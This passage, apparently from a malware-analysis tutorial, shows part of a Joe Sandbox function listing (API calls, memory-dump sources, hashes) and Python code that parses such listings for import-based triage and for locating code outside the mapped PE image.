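• Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
• Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
• lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
• CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
• lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
• Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
• Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
• Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: Xq$Xq$Xq$Xq
• API String ID: 0-3965792415
• Opcode ID: 4f7897a2c8051ba29aa466395f44a5ccac91187d7ee9974b215acd82e4973cca
• Instruction ID: e328931ee99707c7884afb88e86302cf9fa3491a19e217a1ba287b55c15ebacf
• Opcode Fuzzy Hash: 4f7897a2c8051ba29aa466395f44a5ccac91187d7ee9974b215acd82e4973cca
• Instruction Fuzzy Hash: BC313E30E0131A9BDBA48BA984553EEB7F6AB94310F1541AB8459A7351EF70CD81CBA2
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: 00405ACB"; args may contain commas and brackets, so match greedily.
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>[A-Za-z0-9_]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$")
SOURCE_RE = re.compile(r"^Source File: (?P<dump>\S+), Offset: (?P<offset>[0-9A-Fa-f]{8}), based on PE: (?P<pe>true|false)$")


def _new_record():
    return {"apis": [], "strings": [], "source": None, "associated": [], "snapshot": None, "similarity": {}}


def parse_records(text):
    """Split the listing into records; a record is closed by its Instruction Fuzzy Hash line.
    A trailing record cut off before that line (as at the top of the page) is dropped."""
    records, rec, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            section = line
            continue
        if not line.startswith("• "):
            continue  # blank line or unrelated page text
        item = line[2:].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                rec["apis"].append({"name": m["name"], "module": m["module"],
                                    "args": m["args"].split(","), "ref": m["ref"]})
        elif section == "Strings":
            value, sep, xrefs = item.rpartition(", xrefs: ")
            rec["strings"].append({"value": value if sep else item,
                                   "xrefs": xrefs.split(", ") if sep else []})
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(item)
            if m:
                rec["source"] = {"dump": m["dump"], "offset": int(m["offset"], 16), "pe": m["pe"] == "true"}
            elif item.startswith("Associated: "):
                rec["associated"].append(item[len("Associated: "):])
        elif section == "Joe Sandbox IDA Plugin" and item.startswith("Snapshot File: "):
            rec["snapshot"] = item[len("Snapshot File: "):]
        elif section == "Similarity":
            key, _, value = item.partition(":")
            rec["similarity"][key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                records.append(rec)
                rec, section = _new_record(), None
    return records


def api_profile(records):
    """Distinct MODULE!Function imports across all records, for import-based triage."""
    return sorted({f"{a['module']}!{a['name']}" for r in records for a in r["apis"]})


def functions_referencing(records, api_name):
    """Call-site addresses (the 'ref:' field) of every call to api_name, in listing order."""
    return [a["ref"] for r in records for a in r["apis"] if a["name"] == api_name]


def by_dump(records):
    """Function count per (dump, PE-backed) pair; non-PE dumps hold injected or unpacked code."""
    counts = defaultdict(int)
    for r in records:
        if r["source"]:
            counts[(r["source"]["dump"], r["source"]["pe"])] += 1
    return dict(counts)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(api_profile(recs))
    print(by_dump(recs))
```

Feed the whole function listing of a report to `parse_records` and `by_dump` shows at a glance how many recovered functions sit outside the mapped PE (here the 0xD0000 region); `functions_referencing` then gives the addresses to jump to in the corresponding `.jbxd` snapshot.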